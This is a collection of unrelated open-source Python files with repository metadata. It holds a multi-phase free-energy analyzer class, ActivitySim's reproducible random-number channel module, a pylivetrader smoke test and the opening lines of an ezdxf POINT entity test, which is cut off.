_unbiased_decorrelated_N_l = CachedProperty(
name='unbiased_decorrelated_N_l',
dependencies=['unbias_restraint', 'restraint_energy_cutoff', 'restraint_distance_cutoff',
'decorrelated_state_indices_ln', 'decorrelated_u_ln', 'decorrelated_N_l'],
)
@_unbiased_decorrelated_N_l.default
def _unbiased_decorrelated_N_l(self, instance):
return instance._compute_mbar_unbiased_energies()[1]
mbar = CachedProperty(
name='mbar',
dependencies=['unbiased_decorrelated_u_ln', 'unbiased_decorrelated_N_l',
'_extra_analysis_kwargs'],
)
@mbar.default
def mbar(self, instance):
# u_ln[l,n] is the reduced potential for concatenated decorrelated snapshot n evaluated at thermodynamic state l
# Shape is (n_states + n_unsampled_states, n_samples)
# N_l[l] is the number of decorrelated samples sampled from thermodynamic state l, some can be 0.
# Shape is (n_states + n_unsampled_states, )
return instance._create_mbar(instance._unbiased_decorrelated_u_ln,
instance._unbiased_decorrelated_N_l)
# -------------------------------------------------------------------------
# Dynamic properties.
# -------------------------------------------------------------------------
@property
def n_equilibration_iterations(self):
"""int: The number of equilibration iterations."""
return self._equilibration_data[0]
@property
def statistical_inefficiency(self):
"""float: The statistical inefficiency of the sampler."""
return self._equilibration_data[1]
@property
def effective_length(self):
"""float: The length of the production data as a number of uncorrelated samples"""
return self._equilibration_data[2]
@property
def _decorrelated_iterations(self):
"""list of int: the indices of the decorrelated iterations truncated to max_n_iterations."""
if self.use_full_trajectory:
return np.arange(self.max_n_iterations + 1, dtype=int)
equilibrium_iterations = np.array(range(self.n_equilibration_iterations, self.max_n_iterations + 1))
decorrelated_iterations_indices = subsample_correlated_data(equilibrium_iterations,
self.statistical_inefficiency)
return equilibrium_iterations[decorrelated_iterations_indices]
# https://choderalab.slack.com/files/levi.naden/F4G6L9X8S/quick_diagram.png
class MultiPhaseAnalyzer(object):
"""
Multiple Phase Analyzer creator, not to be directly called itself, but instead called by adding or subtracting
different implemented :class:`PhaseAnalyzer` or other :class:`MultiPhaseAnalyzers`'s. The individual Phases of
the :class:`MultiPhaseAnalyzer` are only references to existing Phase objects, not copies. All
:class:`PhaseAnalyzer` and :class:`MultiPhaseAnalyzer` classes support ``+`` and ``-`` operations.
The observables of this phase are determined through inspection of all the passed in phases and only observables
which are shared can be computed. For example:
``PhaseA`` has ``.get_free_energy`` and ``.get_entropy``
``PhaseB`` has ``.get_free_energy`` and ``.get_enthalpy``,
``PhaseAB = PhaseA + PhaseB`` will only have a ``.get_free_energy`` method
Because each Phase may have a different number of states, the ``reference_states`` property of each phase
determines which states from each phase to read the data from.
For observables defined by two states, the i'th and j'th reference states are used:
If we define ``PhaseAB = PhaseA - PhaseB``
Then ``PhaseAB.get_free_energy()`` is roughly equivalent to doing the following:
``A_i, A_j = PhaseA.reference_states``
``B_i, B_j = PhaseB.reference_states``
``PhaseA.get_free_energy()[A_i, A_j] - PhaseB.get_free_energy()[B_i, B_j]``
The above is not exact since get_free_energy returns an error estimate as well
For observables defined by a single state, only the i'th reference state is used
Given ``PhaseAB = PhaseA + PhaseB``, ``PhaseAB.get_temperature()`` is equivalent to:
``A_i = PhaseA.reference_states[0]``
``B_i = PhaseB.reference_states[0]``
``PhaseA.get_temperature()[A_i] + PhaseB.get_temperature()[B_i]``
For observables defined entirely by the phase, no reference states are needed.
Given ``PhaseAB = PhaseA + PhaseB``, ``PhaseAB.get_standard_state_correction()`` gives:
``PhaseA.get_standard_state_correction() + PhaseB.get_standard_state_correction()``
Each phase MUST use the same ObservablesRegistry, otherwise an error is raised
This class is public to see its API.
Parameters
----------
phases : dict
has keys "phases", "names", and "signs"
Attributes
----------
observables
phases
names
signs
registry
See Also
--------
PhaseAnalyzer
ObservablesRegistry
"""
def __init__(self, phases):
"""
Create the compound phase which is any combination of phases to generate a new MultiPhaseAnalyzer.
"""
# Compare ObservableRegistries
ref_registry = phases['phases'][0].registry
for phase in phases['phases'][1:]:
# Use is comparison since we are checking same insetance
if phase.registry is not ref_registry:
raise ValueError("Not all phases have the same ObservablesRegistry! Observable calculation "
"will be inconsistent!")
self.registry = ref_registry
# Determine available observables
observables = []
for observable in self.registry.observables:
shared_observable = True
for phase in phases['phases']:
if observable not in phase.observables:
shared_observable = False
break
if shared_observable:
observables.append(observable)
if len(observables) == 0:
raise RuntimeError("There are no shared computable observable between the phases, combining them will do "
"nothing.")
self._observables = tuple(observables)
self._phases = phases['phases']
self._names = phases['names']
self._signs = phases['signs']
# Set the methods shared between both objects
for observable in self.observables:
setattr(self, "get_" + observable, self._spool_function(observable))
def _spool_function(self, observable):
"""
Dynamic observable calculator layer
Must be in its own function to isolate the variable name space
If you have this in the __init__, the "observable" variable colides with any others in the list, causing a
the wrong property to be fetched.
"""
return lambda: self._compute_observable(observable)
@property
def observables(self):
"""List of observables this :class:`MultiPhaseAnalyzer` can generate"""
return self._observables
@property
def phases(self):
"""List of implemented :class:`PhaseAnalyzer`'s objects this :class:`MultiPhaseAnalyzer` is tied to"""
return self._phases
@property
def names(self):
"""
Unique list of string names identifying this phase. If this :class:`MultiPhaseAnalyzer` is combined with
another, its possible that new names will be generated unique to that :class:`MultiPhaseAnalyzer`, but will
still reference the same phase.
When in doubt, use :func:`MultiPhaseAnalyzer.phases` to get the actual phase objects.
"""
return self._names
@property
def signs(self):
"""
List of signs that are used by the :class:`MultiPhaseAnalyzer` to
"""
return self._signs
def clear(self):
"""
Clear the individual phases of their observables and estimators for re-computing quantities
"""
for phase in self.phases:
phase.clear()
def _combine_phases(self, other, operator='+'):
"""
Function to combine the phases regardless of operator to reduce code duplication. Creates a new
:class:`MultiPhaseAnalyzer` object based on the combined phases of the other. Accepts either a
:class:`PhaseAnalyzer` or a :class:`MultiPhaseAnalyzer`.
If the names have collision, they are re-named with an extra digit at the end.
Parameters
----------
other : :class:`MultiPhaseAnalyzer` or :class:`PhaseAnalyzer`
operator : sign of the operator connecting the two objects
Returns
-------
output : :class:`MultiPhaseAnalyzer`
New :class:`MultiPhaseAnalyzer` where the phases are the combined list of the individual phases from each
component. Because the memory pointers to the individual phases are the same, changing any
single :class:`PhaseAnalyzer`'s
reference_state objects updates all :class:`MultiPhaseAnalyzer` objects they are tied to
"""
phases = []
names = []
signs = []
# create copies
phases.extend(self.phases)
names.extend(self.names)
signs.extend(self.signs)
if isinstance(other, MultiPhaseAnalyzer):
new_phases = other.phases
new_signs = other.signs
new_names = other.names
final_new_names = []
for name in new_names:
other_names = [n for n in new_names if n != name]
final_new_names.append(multistate.utils.generate_phase_name(name, other_names + names))
names.extend(final_new_names)
for new_sign in new_signs:
if (operator == '-' and new_sign == '+') or (operator == '+' and new_sign == '-'):
signs.append('-')
else:
signs.append('+')
signs.extend(new_signs)
phases.extend(new_phases)
elif isinstance(other, PhaseAnalyzer):
names.append(multistate.utils.generate_phase_name(other.name, names))
if (operator == '-' and other._sign == '+') or (operator == '+' and other._sign == '-'):
signs.append('-')
else:
signs.append('+')
other._sign = '+' # Recast to positive if negated
phases.append(other)
else:
baseerr = "cannot {} 'MultiPhaseAnalyzer' and '{}' objects"
if operator == '+':
err = baseerr.format('add', type(other))
else:
err = baseerr.format('subtract', type(other))
raise TypeError(err)
phase_pass = {'phases': phases, 'signs': signs, 'names': names}
return MultiPhaseAnalyzer(phase_pass)
def __add__(self, other):
return self._combine_phases(other, operator='+')
def __sub__(self, other):
return self._combine_phases(other, operator='-')
def __neg__(self):
"""
Return a SHALLOW copy of self with negated signs so that the phase objects all still point to the same
objects
"""
new_signs = []
for sign in self._signs:
if sign == '+':
new_signs.append('-')
else:
new_signs.append('+')
# return a *shallow* copy of self with the signs reversed
output = copy.copy(self)
output._signs = new_signs
return output
def __str__(self):
"""Simplified string output"""
header = "MultiPhaseAnalyzer<{}>"
output_string = ""
for phase_name, sign in zip(self.names, self.signs):
if output_string == "" and sign == '-':
output_string += '{}{} '.format(sign, phase_name)
elif output_string == "":
output_string += '{} '.format(phase_name)
else:
output_string += '{} {} '.format(sign, phase_name)
return header.format(output_string)
def __repr__(self):
"""Generate a detailed representation of the MultiPhase"""
header = "MultiPhaseAnalyzer <\n{}>"
output_string = ""
for phase, phase_name, sign in zip(self.phases, self.names, self.signs):
if output_string == "" and sign == '-':
output_string += '{}{} ({})\n'.format(sign, phase_name, phase)
elif output_string == "":
output_string += '{} ({})\n'.format(phase_name, phase)
else:
output_string += ' {} {} ({})\n'.format(sign, phase_name, phase)
return header.format(output_string)
def _compute_observable(self, observable_name):
"""
Helper function to compute arbitrary observable in both phases
Parameters
----------
observable_name : str
Name of the observable as its defined in the ObservablesRegistry
Returns
-------
observable_value
The observable as its combined between all the phases
"""
def prepare_phase_observable(single_phase):
"""Helper function to cast the observable in terms of observable's registry"""
observable = getattr(single_phase, "get_" + observable_name)()
if isinstance(single_phase, MultiPhaseAnalyzer):
if observable_name in self.registry.observables_with_error:
observable_payload = dict()
observable_payload['value'], observable_payload['error'] = observable
else:
observable_payload = observable
else:
raise_registry_error = False
if observable_name in self.registry.observables_with_error:
observable_payload = {}
if observable_name in self.registry.observables_defined_by_phase:
observable_payload['value'], observable_payload['error'] = observable
elif observable_name in self.registry.observables_defined_by_single_state:
observable_payload['value'] = observable[0][single_phase.reference_states[0]]
observable_payload['error'] = observable[1][single_phase.reference_states[0]]
elif observable_name in self.registry.observables_defined_by_two_states:
observable_payload['value'] = observable[0][single_phase.reference_states[0],
single_phase.reference_states[1]]
observable_payload['error'] = observable[1][single_phase.reference_states[0],
single_phase.reference_states[1]]
else:
raise_registry_error = True
else: # No error
if observable_name in self.registry.observables_defined_by_phase:
observable_payload = observable
elif observable_name in self.registry.observables_defined_by_single_state:
observable_payload = observable[single_phase.reference_states[0]]
elif observable_name in self.registry.observables_defined_by_two_states:
observable_payload = observable[single_phase.reference_states[0],
single_phase.reference_states[1]]
else:
raise_registry_error = True
if raise_registry_error:
raise RuntimeError("You have requested an observable that is improperly registered in the "
"ObservablesRegistry!")
return observable_payload
def modify_final_output(passed_output, payload, sign):
if observable_name in self.registry.observables_with_error:
if sign == '+':
passed_output['value'] += payload['value']
else:
passed_output['value'] -= payload['value']
if observable_name in self.registry.observables_with_error_adding_linear:
passed_output['error'] += payload['error']
elif observable_name in self.registry.observables_with_error_adding_quadrature:
passed_output['error'] = (passed_output['error']**2 + payload['error']**2)**0.5
else:
if sign == '+':
passed_output += payload
else:
passed_output -= payload
return passed_output
if observable_name in self.registry.observables_with_error:
final_output = {'value': 0, 'error': 0}
else:
final_output = 0
for phase, phase_sign in zip(self.phases, self.signs):
phase_observable = prepare_phase_observable(phase)
final_output = modify_final_output(final_output, phase_observable, phase_sign)
if observable_name in self.registry.observables_with_error:
# Cast output to tuple
final_output = (final_output['value'], final_output['error'])
return final_output
|
a6e72407b04f6759673354408022422368988479
|
aae3c6fccb2296e4da5bb10310f5dd6baba8b7de
|
/activitysim/core/random.py
|
dc34e27291d240ec07cc9dacdc3b2e62b64cfeab
|
[
"BSD-3-Clause"
] |
permissive
|
ActivitySim/activitysim
|
3d938e616452be76db1bb0c8a1212e12b9216823
|
a8e755f96d0e32633a6d3657c4878e3b6a37e59a
|
refs/heads/main
| 2023-08-08T16:02:06.275693
| 2023-05-09T13:08:23
| 2023-05-09T13:08:23
| 20,981,950
| 118
| 89
|
BSD-3-Clause
| 2023-07-25T14:07:16
| 2014-06-18T23:57:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 28,168
|
py
|
random.py
|
# ActivitySim
# See full license in LICENSE.txt.
import hashlib
import logging
from builtins import object, range
import numpy as np
import pandas as pd
from activitysim.core.util import reindex
from .tracing import print_elapsed_time
logger = logging.getLogger(__name__)
# one more than 0xFFFFFFFF so we can wrap using: int64 % _MAX_SEED
_MAX_SEED = 1 << 32
_SEED_MASK = 0xFFFFFFFF
def hash32(s):
"""
Parameters
----------
s: str
Returns
-------
32 bit unsigned hash
"""
s = s.encode("utf8")
h = hashlib.md5(s).hexdigest()
return int(h, base=16) & _SEED_MASK
class SimpleChannel(object):
"""
We need to ensure that we generate the same random streams (when re-run or even across
different simulations.) We do this by generating a random seed for each domain_df row
that is based on the domain_df index (which implies that generated tables like tours
and trips are also created with stable, predictable, repeatable row indexes.
Because we need to generate a distinct stream for each step, we can't just use the
domain_df index - we need a strategy for handling multiple steps without generating
collisions between streams (i.e. choosing the same seed for more than one stream.)
The easiest way to do this would be to use an array of integers to seed the generator,
with a global seed, a channel seed, a row seed, and a step seed. Unfortunately, seeding
numpy RandomState with arrays is a LOT slower than with a single integer seed, and
speed matters because we reseed on-the-fly for every call because creating a different
RandomState object for each row uses too much memory (5K per RandomState object)
numpy random seeds are unsigned int32 so there are 4,294,967,295 available seeds.
That is probably just about enough to distribute evenly, for most cities, depending on the
number of households, persons, tours, trips, and steps.
So we use (global_seed + channel_seed + step_seed + row_index) % (1 << 32)
to get an int32 seed rather than a tuple.
We do read in the whole households and persons tables at start time, so we could note the
max index values. But we might then want a way to ensure stability between the test, example,
and full datasets. I am punting on this for now.
"""
def __init__(self, channel_name, base_seed, domain_df, step_name):
self.base_seed = base_seed
# ensure that every channel is different, even for the same df index values and max_steps
self.channel_name = channel_name
self.channel_seed = hash32(self.channel_name)
self.step_name = None
self.step_seed = None
self.row_states = None
# create dataframe to hold state for every df row
self.extend_domain(domain_df)
assert self.row_states.shape[0] == domain_df.shape[0]
if step_name:
self.begin_step(step_name)
def init_row_states_for_step(self, row_states):
"""
initialize row states (in place) for new step
with stable, predictable, repeatable row_seeds for that domain_df index value
See notes on the seed generation strategy in class comment above.
Parameters
----------
row_states
"""
assert self.step_name
if self.step_name and not row_states.empty:
row_states["row_seed"] = (
self.base_seed + self.channel_seed + self.step_seed + row_states.index
) % _MAX_SEED
# number of rands pulled this step
row_states["offset"] = 0
return row_states
def extend_domain(self, domain_df):
"""
Extend or create row_state df by adding seed info for each row in domain_df
If extending, the index values of new tables must be disjoint so
there will be no ambiguity/collisions between rows
Parameters
----------
domain_df : pandas.DataFrame
domain dataframe with index values for which random streams are to be generated
and well-known index name corresponding to the channel
"""
if domain_df.empty:
logger.warning(
"extend_domain for channel %s for empty domain_df" % self.channel_name
)
# dataframe to hold state for every df row
row_states = pd.DataFrame(columns=["row_seed", "offset"], index=domain_df.index)
if self.step_name and not row_states.empty:
self.init_row_states_for_step(row_states)
if self.row_states is None:
self.row_states = row_states
else:
# row_states already exists, so we are extending
# if extending, these should be new rows, no intersection with existing row_states
assert len(self.row_states.index.intersection(domain_df.index)) == 0
self.row_states = pd.concat([self.row_states, row_states])
def begin_step(self, step_name):
"""
Reset channel state for a new state
Parameters
----------
step_name : str
pipeline step name for this step
"""
assert self.step_name is None
self.step_name = step_name
self.step_seed = hash32(self.step_name)
self.init_row_states_for_step(self.row_states)
# standard constant to use for choice_for_df instead of fast-forwarding rand stream
self.multi_choice_offset = None
def end_step(self, step_name):
assert self.step_name == step_name
self.step_name = None
self.step_seed = None
self.row_states["offset"] = 0
self.row_states["row_seed"] = 0
def _generators_for_df(self, df):
"""
Python generator function for iterating over numpy prngs (nomenclature collision!)
seeded and fast-forwarded on-the-fly to the appropriate position in the channel's
random number stream for each row in df.
WARNING:
since we are reusing a single underlying randomstate,
prng must be called when yielded as generated sequence,
not serialized and called later after iterator finishes
Parameters
----------
df : pandas.DataFrame
dataframe with index values for which random streams are to be generated
and well-known index name corresponding to the channel
"""
# assert no dupes
assert len(df.index.unique()) == len(df.index)
df_row_states = self.row_states.loc[df.index]
prng = np.random.RandomState()
for row in df_row_states.itertuples():
prng.seed(row.row_seed)
if row.offset:
# consume rands
prng.rand(row.offset)
yield prng
def random_for_df(self, df, step_name, n=1):
"""
Return n floating point random numbers in range [0, 1) for each row in df
using the appropriate random channel for each row.
Subsequent calls (in the same step) will return the next rand for each df row
The resulting array will be the same length (and order) as df
This method is designed to support alternative selection from a probability array
The columns in df are ignored; the index name and values are used to determine
which random number sequence to to use.
If "true pseudo random" behavior is desired (i.e. NOT repeatable) the set_base_seed
method (q.v.) may be used to globally reseed all random streams.
Parameters
----------
df : pandas.DataFrame
df with index name and values corresponding to a registered channel
n : int
number of rands desired per df row
Returns
-------
rands : 2-D ndarray
array the same length as df, with n floats in range [0, 1) for each df row
"""
assert self.step_name
assert self.step_name == step_name
# - reminder: prng must be called when yielded as generated sequence, not serialized
generators = self._generators_for_df(df)
rands = np.asanyarray([prng.rand(n) for prng in generators])
# update offset for rows we handled
self.row_states.loc[df.index, "offset"] += n
return rands
def normal_for_df(self, df, step_name, mu, sigma, lognormal=False, size=None):
"""
Return a floating point random number in normal (or lognormal) distribution
for each row in df using the appropriate random channel for each row.
Subsequent calls (in the same step) will return the next rand for each df row
The resulting array will be the same length (and order) as df
This method is designed to support alternative selection from a probability array
The columns in df are ignored; the index name and values are used to determine
which random number sequence to to use.
If "true pseudo random" behavior is desired (i.e. NOT repeatable) the set_base_seed
method (q.v.) may be used to globally reseed all random streams.
Parameters
----------
df : pandas.DataFrame or Series
df or series with index name and values corresponding to a registered channel
mu : float or pd.Series or array of floats with one value per df row
sigma : float or array of floats with one value per df row
Returns
-------
rands : 2-D ndarray
array the same length as df, with n floats in range [0, 1) for each df row
"""
assert self.step_name
assert self.step_name == step_name
def to_series(x):
if np.isscalar(x):
return [x] * len(df)
elif isinstance(x, pd.Series):
return x.values
return x
# - reminder: prng must be called when yielded as generated sequence, not serialized
generators = self._generators_for_df(df)
mu = to_series(mu)
sigma = to_series(sigma)
if lognormal:
rands = np.asanyarray(
[
prng.lognormal(mean=mu[i], sigma=sigma[i], size=size)
for i, prng in enumerate(generators)
]
)
else:
rands = np.asanyarray(
[
prng.normal(loc=mu[i], scale=sigma[i], size=size)
for i, prng in enumerate(generators)
]
)
# update offset for rows we handled
if size is not None:
consume_offsets = int(size)
else:
consume_offsets = 1
self.row_states.loc[df.index, "offset"] += consume_offsets
return rands
def choice_for_df(self, df, step_name, a, size, replace):
"""
Apply numpy.random.choice once for each row in df
using the appropriate random channel for each row.
Concatenate the the choice arrays for every row into a single 1-D ndarray
The resulting array will be of length: size * len(df.index)
This method is designed to support creation of a interaction_dataset
The columns in df are ignored; the index name and values are used to determine
which random number sequence to to use.
Parameters
----------
df : pandas.DataFrame
df with index name and values corresponding to a registered channel
step_name : str
current step name so we can update row_states seed info
The remaining parameters are passed through as arguments to numpy.random.choice
a : 1-D array-like or int
If an ndarray, a random sample is generated from its elements.
If an int, the random sample is generated as if a was np.arange(n)
size : int or tuple of ints
Output shape
replace : boolean
Whether the sample is with or without replacement
Returns
-------
choices : 1-D ndarray of length: size * len(df.index)
The generated random samples for each row concatenated into a single (flat) array
"""
assert self.step_name
assert self.step_name == step_name
# initialize the generator iterator
generators = self._generators_for_df(df)
sample = np.concatenate(
tuple(prng.choice(a, size, replace) for prng in generators)
)
if not self.multi_choice_offset:
# FIXME - if replace, should we estimate rands_consumed?
if replace:
logger.warning("choice_for_df MULTI_CHOICE_FF with replace")
# update offset for rows we handled
self.row_states.loc[df.index, "offset"] += size
return sample
class Random(object):
def __init__(self):
self.channels = {}
# dict mapping df index name to channel name
self.index_to_channel = {}
self.step_name = None
self.step_seed = None
self.base_seed = 0
self.global_rng = np.random.RandomState()
def get_channel_for_df(self, df):
"""
Return the channel for this df. Channel should already have been loaded/added.
Parameters
----------
df : pandas.dataframe
either a domain_df for a channel being added or extended
or a df for which random values are to be generated
"""
channel_name = self.index_to_channel.get(df.index.name, None)
if channel_name is None:
raise RuntimeError("No channel with index name '%s'" % df.index.name)
return self.channels[channel_name]
# step handling
def begin_step(self, step_name):
"""
Register that the pipeline has entered a new step and that global and channel streams
should transition to the new stream.
Parameters
----------
step_name : str
pipeline step name
"""
assert self.step_name is None
assert step_name is not None
self.step_name = step_name
self.step_seed = hash32(step_name)
seed = [self.base_seed, self.step_seed]
self.global_rng = np.random.RandomState(seed)
for c in self.channels:
self.channels[c].begin_step(self.step_name)
def end_step(self, step_name):
"""
This is mostly just for internal consistency checking -
I'm not sure it serves any useful purpose except to catch "mis-steps" in the pipeline code
Parameters
----------
step_name : str
name of current step (just a consistency check)
"""
assert self.step_name is not None
assert self.step_name == step_name
for c in self.channels:
self.channels[c].end_step(self.step_name)
self.step_name = None
self.step_seed = None
self.global_rng = None
# channel management
def add_channel(self, channel_name, domain_df):
"""
Create or extend a channel for generating random number streams for domain_df.
We need to be prepared to extend an existing channel because mandatory and non-mandatory
tours are generated separately by different sub-models, but end up members of a common
tours channel.
Parameters
----------
domain_df : pandas.DataFrame
domain dataframe with index values for which random streams are to be generated
and well-known index name corresponding to the channel
channel_name : str
expected channel name provided as a consistency check
"""
if channel_name in self.channels:
assert channel_name == self.index_to_channel[domain_df.index.name]
logger.debug(
"Random: extending channel '%s' %s ids"
% (channel_name, len(domain_df.index))
)
channel = self.channels[channel_name]
channel.extend_domain(domain_df)
else:
logger.debug(
"Adding channel '%s' %s ids" % (channel_name, len(domain_df.index))
)
channel = SimpleChannel(
channel_name, self.base_seed, domain_df, self.step_name
)
self.channels[channel_name] = channel
self.index_to_channel[domain_df.index.name] = channel_name
def drop_channel(self, channel_name):
"""
Drop channel that won't be used again (saves memory)
Parameters
----------
channel_name
"""
if channel_name in self.channels:
logger.debug("Dropping channel '%s'" % (channel_name,))
del self.channels[channel_name]
else:
logger.error(
"drop_channel called with unknown channel '%s'" % (channel_name,)
)
def set_base_seed(self, seed=None):
"""
Like seed for numpy.random.RandomState, but generalized for use with all random streams.
Provide a base seed that will be added to the seeds of all random streams.
The default base seed value is 0, so set_base_seed(0) is a NOP
set_base_seed(1) will (e.g.) provide a different set of random streams than the default
but will provide repeatable results re-running or resuming the simulation
set_base_seed(None) will set the base seed to a random and unpredictable integer and so
provides "fully pseudo random" non-repeatable streams with different results every time
Must be called before first step (before any channels are added or rands are consumed)
Parameters
----------
seed : int or None
"""
if self.step_name is not None or self.channels:
raise RuntimeError("Can only call set_base_seed before the first step.")
assert len(list(self.channels.keys())) == 0
if seed is None:
self.base_seed = np.random.RandomState().randint(_MAX_SEED, dtype=np.uint32)
logger.debug("Set random seed randomly to %s" % self.base_seed)
else:
logger.debug("Set random seed base to %s" % seed)
self.base_seed = seed
def get_global_rng(self):
"""
Return a numpy random number generator for use within current step.
This method is designed to provide random numbers for uses that do not correspond to
known channel domains. e.g. to select a subset of households to use for the simulation.
global_rng is reseeded to a predictable value at the beginning of every step so that
it behaves repeatably when simulation is resumed or re-run.
If "true pseudo random" behavior is desired (i.e. NOT repeatable) the set_base_seed
method (q.v.) may be used to globally reseed all random streams.
Returns
-------
global_rng : numpy.random.RandomState()
numpy random number generator for use within current step
"""
assert self.step_name is not None
return self.global_rng
def get_external_rng(self, one_off_step_name):
"""
Return a numpy random number generator for step-independent one_off use
exists to allow sampling of input tables consistent no matter what step they are called in
"""
seed = [self.base_seed, hash32(one_off_step_name)]
return np.random.RandomState(seed)
def random_for_df(self, df, n=1):
"""
Return a single floating point random number in range [0, 1) for each row in df
using the appropriate random channel for each row.
Subsequent calls (in the same step) will return the next rand for each df row
The resulting array will be the same length (and order) as df
This method is designed to support alternative selection from a probability array
The columns in df are ignored; the index name and values are used to determine
which random number sequence to to use.
We assume that we can identify the channel to used based on the name of df.index
This channel should have already been registered by a call to add_channel (q.v.)
If "true pseudo random" behavior is desired (i.e. NOT repeatable) the set_base_seed
method (q.v.) may be used to globally reseed all random streams.
Parameters
----------
df : pandas.DataFrame
df with index name and values corresponding to a registered channel
n : int
number of rands desired (default 1)
Returns
-------
choices : 1-D ndarray the same length as df
a single float in range [0, 1) for each row in df
"""
# FIXME - for tests
if not self.channels:
rng = np.random.RandomState(0)
rands = np.asanyarray([rng.rand(n) for _ in range(len(df))])
return rands
channel = self.get_channel_for_df(df)
rands = channel.random_for_df(df, self.step_name, n)
return rands
def normal_for_df(self, df, mu=0, sigma=1, broadcast=False, size=None):
"""
Return a single floating point normal random number in range (-inf, inf) for each row in df
using the appropriate random channel for each row.
Subsequent calls (in the same step) will return the next rand for each df row
The resulting array will be the same length (and order) as df
This method is designed to support alternative selection from a probability array
The columns in df are ignored; the index name and values are used to determine
which random number sequence to to use.
We assume that we can identify the channel to used based on the name of df.index
This channel should have already been registered by a call to add_channel (q.v.)
If "true pseudo random" behavior is desired (i.e. NOT repeatable) the set_base_seed
method (q.v.) may be used to globally reseed all random streams.
Parameters
----------
df : pandas.DataFrame
df with index name and values corresponding to a registered channel
mu : float or array of floats with one value per df row
sigma : float or array of floats with one value per df row
Returns
-------
rands : 1-D ndarray the same length as df (or Series with same index as df)
a single float in lognormal distribution for each row in df
"""
channel = self.get_channel_for_df(df)
if broadcast:
alts_df = df
df = df.index.unique().to_series()
rands = channel.normal_for_df(
df, self.step_name, mu=0, sigma=1, lognormal=False, size=size
)
if size is not None:
rands = reindex(pd.DataFrame(rands, index=df.index), alts_df.index)
else:
rands = reindex(pd.Series(rands, index=df.index), alts_df.index)
rands = rands * sigma + mu
else:
rands = channel.normal_for_df(
df, self.step_name, mu, sigma, lognormal=False, size=size
)
return rands
def lognormal_for_df(self, df, mu, sigma, broadcast=False, scale=False):
"""
Return a single floating point lognormal random number in range [0, inf) for each row in df
using the appropriate random channel for each row.
Note that by default (scale=False) the mean and standard deviation are not the values for
the distribution itself, but of the underlying normal distribution it is derived from.
This is perhaps counter-intuitive, but it is the way the numpy standard works,
and so we are conforming to it here.
If scale=True, then mu and sigma are the desired mean and standard deviation of the
lognormal distribution instead of the numpy standard where mu and sigma which are the
values for the distribution itself, rather than of the underlying normal distribution
it is derived from.
Subsequent calls (in the same step) will return the next rand for each df row
The resulting array will be the same length (and order) as df
This method is designed to support alternative selection from a probability array
The columns in df are ignored; the index name and values are used to determine
which random number sequence to to use.
We assume that we can identify the channel to used based on the name of df.index
This channel should have already been registered by a call to add_channel (q.v.)
If "true pseudo random" behavior is desired (i.e. NOT repeatable) the set_base_seed
method (q.v.) may be used to globally reseed all random streams.
Parameters
----------
df : pandas.DataFrame, Series, or Index
df with index name and values corresponding to a registered channel
mu : float or array of floats with one value per df row
sigma : float or array of floats with one value per df row
Returns
-------
rands : 1-D ndarray the same length as df (or Series with same index as df)
a single float in lognormal distribution for each row in df
"""
if scale:
# location = ln(mean/sqrt(1 + std_dev^2/mean^2))
# scale = sqrt(ln(1 + std_dev^2/mean^2))
x = 1 + ((sigma * sigma) / (mu * mu))
mu = np.log(mu / (np.sqrt(x)))
sigma = np.sqrt(np.log(x))
if broadcast:
rands = self.normal_for_df(df, mu=mu, sigma=sigma, broadcast=True)
rands = np.exp(rands)
else:
channel = self.get_channel_for_df(df)
rands = channel.normal_for_df(
df, self.step_name, mu=mu, sigma=sigma, lognormal=True
)
return rands
def choice_for_df(self, df, a, size, replace):
"""
Apply numpy.random.choice once for each row in df
using the appropriate random channel for each row.
Concatenate the the choice arrays for every row into a single 1-D ndarray
The resulting array will be of length: size * len(df.index)
This method is designed to support creation of a interaction_dataset
The columns in df are ignored; the index name and values are used to determine
which random number sequence to to use.
We assume that we can identify the channel to used based on the name of df.index
This channel should have already been registered by a call to add_channel (q.v.)
Parameters
----------
df : pandas.DataFrame
df with index name and values corresponding to a registered channel
The remaining parameters are passed through as arguments to numpy.random.choice
a : 1-D array-like or int
If an ndarray, a random sample is generated from its elements.
If an int, the random sample is generated as if a was np.arange(n)
size : int or tuple of ints
Output shape
replace : boolean
Whether the sample is with or without replacement
Returns
-------
choices : 1-D ndarray of length: size * len(df.index)
The generated random samples for each row concatenated into a single (flat) array
"""
# FIXME - for tests
if not self.channels:
rng = np.random.RandomState(0)
choices = np.concatenate(
tuple(rng.choice(a, size, replace) for _ in range(len(df)))
)
return choices
t0 = print_elapsed_time()
channel = self.get_channel_for_df(df)
choices = channel.choice_for_df(df, self.step_name, a, size, replace)
t0 = print_elapsed_time(
"choice_for_df for %s rows" % len(df.index), t0, debug=True
)
return choices
|
1d54dfcfaf440d84acefcc6dd917f7041825ccfe
|
fd71cb00faadf42649d732d6f434dc097a77efb9
|
/examples/MACD/smoke_macd.py
|
839febde941b5454a5ca90b231855ca494e70064
|
[
"Apache-2.0"
] |
permissive
|
alpacahq/pylivetrader
|
bdde914cb503ea514cb85968eb17a6d298974297
|
d32334dd496d29d50bab9f934bab3778e50bd653
|
refs/heads/master
| 2023-08-06T12:56:43.089785
| 2022-04-11T19:42:20
| 2022-04-11T19:42:20
| 143,319,472
| 686
| 231
|
Apache-2.0
| 2022-10-04T15:17:22
| 2018-08-02T16:26:17
|
Python
|
UTF-8
|
Python
| false
| false
| 285
|
py
|
smoke_macd.py
|
import examples.MACD.macd_example as algo
from pylivetrader.testing.smoke import harness
def test_algo():
harness.run_smoke(algo)
if __name__ == '__main__':
import sys
from logbook import StreamHandler
StreamHandler(sys.stdout).push_application()
test_algo()
|
a1c20eaf8f25bedeb517b7ee5da010430d5b9257
|
27b86f422246a78704e0e84983b2630533a47db6
|
/tests/test_02_dxf_graphics/test_201_point.py
|
43b8cc5bd1576b652c9a94a1ead990ad056db29a
|
[
"MIT"
] |
permissive
|
mozman/ezdxf
|
7512decd600896960660f0f580cab815bf0d7a51
|
ba6ab0264dcb6833173042a37b1b5ae878d75113
|
refs/heads/master
| 2023-09-01T11:55:13.462105
| 2023-08-15T11:50:05
| 2023-08-15T12:00:04
| 79,697,117
| 750
| 194
|
MIT
| 2023-09-14T09:40:41
| 2017-01-22T05:55:55
|
Python
|
UTF-8
|
Python
| false
| false
| 4,071
|
py
|
test_201_point.py
|
# Copyright (c) 2019-2020 Manfred Moitzi
# License: MIT License
import pytest
import math
from ezdxf.entities.point import Point
from ezdxf.lldxf.const import DXF12, DXF2000
from ezdxf.lldxf.tagwriter import TagCollector, basic_tags_from_text
from ezdxf.math import Matrix44
from ezdxf.explode import explode_entity
TEST_CLASS = Point
TEST_TYPE = "POINT"
ENTITY_R12 = """0
